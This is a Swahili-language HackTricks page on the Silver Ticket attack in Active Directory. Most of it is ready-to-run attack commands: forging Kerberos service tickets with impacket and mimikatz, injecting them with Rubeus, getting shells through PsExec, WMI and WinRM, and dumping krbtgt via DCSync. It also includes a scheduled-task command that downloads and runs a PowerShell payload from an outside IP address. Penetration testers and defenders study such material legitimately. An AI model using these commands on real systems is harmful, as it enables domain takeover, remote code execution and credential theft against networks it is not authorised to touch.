Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

Silver Ticket

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Sawa tip: jiandikishe kwa Intigriti, jukwaa la bug bounty la malipo ya juu lililoanzishwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na anza kupata zawadi hadi $100,000!

Tiketi ya Fedha

Shambulio la Tiketi ya Fedha linahusisha kutumia tiketi za huduma katika mazingira ya Active Directory (AD). Mbinu hii inategemea kupata hash ya NTLM ya akaunti ya huduma, kama vile akaunti ya kompyuta, kufanya tiketi ya Huduma ya Kutoa Tiketi (TGS). Kwa tiketi iliyodanganywa hivi, mshambuliaji anaweza kupata huduma maalum kwenye mtandao, kujifanya kuwa mtumiaji yeyote, kwa kawaida lengo likiwa ni kupata mamlaka ya usimamizi. Inasisitizwa kwamba kutumia funguo za AES kwa kufanya tiketi ni salama zaidi na inaweza kugunduliwa kidogo.

Kwa kutengeneza tiketi, zana tofauti hutumiwa kulingana na mfumo wa uendeshaji:

Kwenye Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Kwenye Windows

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Huduma Zinazopatikana

Aina ya HudumaTiketi za Fedha za Huduma

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Kulingana na OS pia:

WSMAN

RPCSS

WinRM

HOST

HTTP

Katika baadhi ya matukio unaweza tu kuomba: WINRM

Kazi Zilizopangwa

HOST

Kushiriki Faili za Windows, pia psexec

CIFS

Operesheni za LDAP, pamoja na DCSync

LDAP

Zana za Usimamizi wa Seva ya Mbali ya Windows

RPCSS

LDAP

CIFS

Tiketi za Dhahabu

krbtgt

Kutumia Rubeus unaweza kuomba zote tiketi hizi kwa kutumia parameter:

  • /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Matukio ya Tiketi za Fedha

  • 4624: Ingia kwenye Akaunti

  • 4634: Toka kwenye Akaunti

  • 4672: Ingia kama Msimamizi

Kutumia vibaya Tiketi za Huduma

Katika mifano ifuatayo fikiria kuwa tiketi inapokelewa kwa kujifanya akaunti ya msimamizi.

CIFS

Kwa tiketi hii utaweza kufikia folda za C$ na ADMIN$ kupitia SMB (ikiwa zimefunuliwa) na kunakili faili kwenye sehemu ya mfumo wa mbali kwa kufanya kitu kama:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

MHUDUMA

Kwa idhini hii unaweza kuzalisha kazi zilizopangwa kwenye kompyuta za mbali na kutekeleza amri za kupindukia:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

MHUDUMA + RPCSS

Kwa tiketi hizi unaweza kutekeleza WMI kwenye mfumo wa mwathiriwa:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

Pata maelezo zaidi kuhusu wmiexec katika ukurasa ufuatao:

pageWmicExec

HOST + WSMAN (WINRM)

Ukiwa na ufikiaji wa winrm kwenye kompyuta unaweza kuipata na hata kupata PowerShell:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

Angalia ukurasa ufuatao kujifunza njia zaidi za kuunganisha na mwenyeji wa mbali kwa kutumia winrm:

pageWinRM

Tafadhali kumbuka kwamba winrm lazima iwe hai na isikilize kwenye kompyuta ya mbali ili kuifikia.

LDAP

Kwa haki hii unaweza kudumpisha database ya DC kwa kutumia DCSync:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Jifunze zaidi kuhusu DCSync kwenye ukurasa ufuatao:

Marejeo

pageDCSync

Siri ya tuzo ya mdudu: jiandikishe kwa Intigriti, jukwaa la tuzo la mdudu la malipo lililoundwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na anza kupata tuzo hadi $100,000!

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

PreviousSID-History InjectionNextSkeleton Key

Last updated